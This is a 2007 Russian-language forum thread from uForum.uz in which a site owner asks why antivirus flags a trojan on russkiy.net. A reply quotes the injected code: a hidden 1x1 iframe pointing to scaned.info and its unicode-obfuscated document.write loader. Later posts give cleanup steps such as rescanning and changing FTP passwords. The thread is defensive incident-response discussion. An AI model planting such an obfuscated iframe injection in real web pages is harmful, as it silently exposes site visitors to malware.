Моё меню Общее меню Сообщество Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность
Сообщения за день Поиск
Знаете ли Вы, что ...
...инструкция по установке аватара описана в Правилах форума.
<< Предыдущий совет - Случайный совет - Следующий совет >>

Информационная безопасность Вопросы по защите информации и данных в сетях телекоммуникаций


Ответить

 
Опции темы Опции просмотра
Старый 12.10.2007 14:25   #1  
Open ID GroupG.Woo
Аватар для Ilya V. Dolgushin
Оффлайн
Студия дизайна Strogo.net
Арт-директор
AKA:G.Woo
Сообщений: 5,707
+ 2,025  1,181/774
– 0  0/0

UzbekistanОтправить сообщение для Ilya V. Dolgushin с помощью ICQОтправить сообщение для Ilya V. Dolgushin с помощью Skype™LiveJournal
Есть ли инфекция на russkiy.net?

Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.
Ответить 
Старый 12.10.2007 14:47   #2  
Аватар для shumbola
Оффлайн
Сообщений: 3,327
+ 337  892/590
– 3  31/25

Uzbekistan
Цитата:
Сообщение от Ilya V. Dolgushin Посмотреть сообщение
Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.
Внедрили следующее:

<iframe width=1 height=1 border=0 frameborder=0 src="http://scaned.info/tds/in.cgi?2"></iframe>

в коде это выглядить как:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065\u0020\u0077\u0069\u0064\u0074 \u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u 0068\u0074\u003d\u0031\u0020\u0062\u006f\u0072\u00 64\u0065\u0072\u003d\u0030\u0020\u0066\u0072\u0061 \u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u 003d\u0030\u0020\u0073\u0072\u0063\u003d\u0022\u00 68\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0063 \u0061\u006e\u0065\u0064\u002e\u0069\u006e\u0066\u 006f\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u00 2e\u0063\u0067\u0069\u003f\u0032\u0022\u003e\u003c \u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

Что делать? Для начала удалить этот script. Потом обследовать как они это внедрили и принять соотв. меры
Ответить 
"+" от:
Старый 12.10.2007 15:01   #3  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
1) Проверить персональный компьютер антивирусом. Вполне возможно что подцепили вирус.
2) Сменить пароли на доступ к фтп сервера и административную панель управления сайтом.
3) Заблокировать в межсетевом экране вредоносную ссылку.
Ответить 
"+" от:
Старый 12.10.2007 20:29   #4  
Open ID GroupG.Woo
Аватар для Ilya V. Dolgushin
Оффлайн
Студия дизайна Strogo.net
Арт-директор
AKA:G.Woo
Сообщений: 5,707
+ 2,025  1,181/774
– 0  0/0

UzbekistanОтправить сообщение для Ilya V. Dolgushin с помощью ICQОтправить сообщение для Ilya V. Dolgushin с помощью Skype™LiveJournal
Скрипт удалён. Есть вероятность что поломали пароль админки Джомлы.
Удалил скрипт, поменял пароль, удалил из списка зарегистрированных пользователей тех, кто вызывал подозрение.
По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.
Продолжаю искать причину.
Ответить 
Старый 13.10.2007 00:49   #5  
Real ID Group uParty Member
Аватар для Ruslan Juldashev
Оффлайн
Веб-разработчик
AKA:monitoringe
Сообщений: 3,550
+ 664  1,588/953
– 8  3/2

UzbekistanОтправить сообщение для Ruslan Juldashev с помощью Skype™LiveJournalМой КругАккаунт на TwitterМой мир
Цитата:
Сообщение от Ilya V. Dolgushin Посмотреть сообщение
По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.
Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок.
Ответить 
Старый 13.10.2007 01:17   #6  
Real ID Group
Аватар для Meylikulov Olim
Оффлайн
AKA:K2
Сообщений: 551
+ 149  98/60
– 0  0/0

Uzbekistan
от Джумлы пароли можешь не менять=)
1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта.

2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить.
Ответить 
"+" от:
Старый 13.10.2007 07:24   #7  
Open ID GroupG.Woo
Аватар для Ilya V. Dolgushin
Оффлайн
Студия дизайна Strogo.net
Арт-директор
AKA:G.Woo
Сообщений: 5,707
+ 2,025  1,181/774
– 0  0/0

UzbekistanОтправить сообщение для Ilya V. Dolgushin с помощью ICQОтправить сообщение для Ilya V. Dolgushin с помощью Skype™LiveJournal
Цитата:
Сообщение от Ruslan Yuldashev Посмотреть сообщение
Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок.
Руслан, так я хард полностью, весь форматнул, разбил диск, систему поставил по новой. Установил дрова и спустя некоторое время на рабочем столе повляется гадкий bin2. Вот я и интересуюсь, куда он мог спрятаться?
Сейчас третий раз переустанавливал систему, пока что всё в норме... Может это прямая атака на мою машину?
Оффтоп:
Может великий магистр шаманит там что-нибудь?


Цитата:
Сообщение от Meylikulov Olim Посмотреть сообщение
от Джумлы пароли можешь не менять=)
Почему? На всякий пожарный пусть будет
Цитата:
Сообщение от Meylikulov Olim Посмотреть сообщение
1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта.
Сделано...
Цитата:
Сообщение от Meylikulov Olim Посмотреть сообщение
2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить.
Сделано...
Обнаруженых вирусов - 0.
Но что-то всё-равно страшно.
Ответить 
Реклама и уведомления
Старый 13.10.2007 17:26   #8  
Real ID Group
Аватар для Meylikulov Olim
Оффлайн
AKA:K2
Сообщений: 551
+ 149  98/60
– 0  0/0

Uzbekistan
Цитата:
Обнаруженых вирусов - 0.
странно...
антивирь какой?
Ответить 
Старый 13.10.2007 17:57   #9  
Real ID Group Ultimate uParty Member ЕС
Аватар для Evgeniy Sklyarevskiy
Оффлайн
UZINFOCOM
Сотрудник ZiyoNET
AKA:ЕС, barbaris, arbuz
Сообщений: 32,709
+ 10,568  16,236/8,377
– 50  472/298

UzbekistanLiveJournalАккаунт на TwitterFacebook
Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.
Ответить 
Старый 13.10.2007 21:08   #10  
Real ID Group
Аватар для Meylikulov Olim
Оффлайн
AKA:K2
Сообщений: 551
+ 149  98/60
– 0  0/0

Uzbekistan
Цитата:
Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.
пароли скорей всего уходят в ботнет, а там уже масссивно внедряют код
Ответить 
Ответить




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх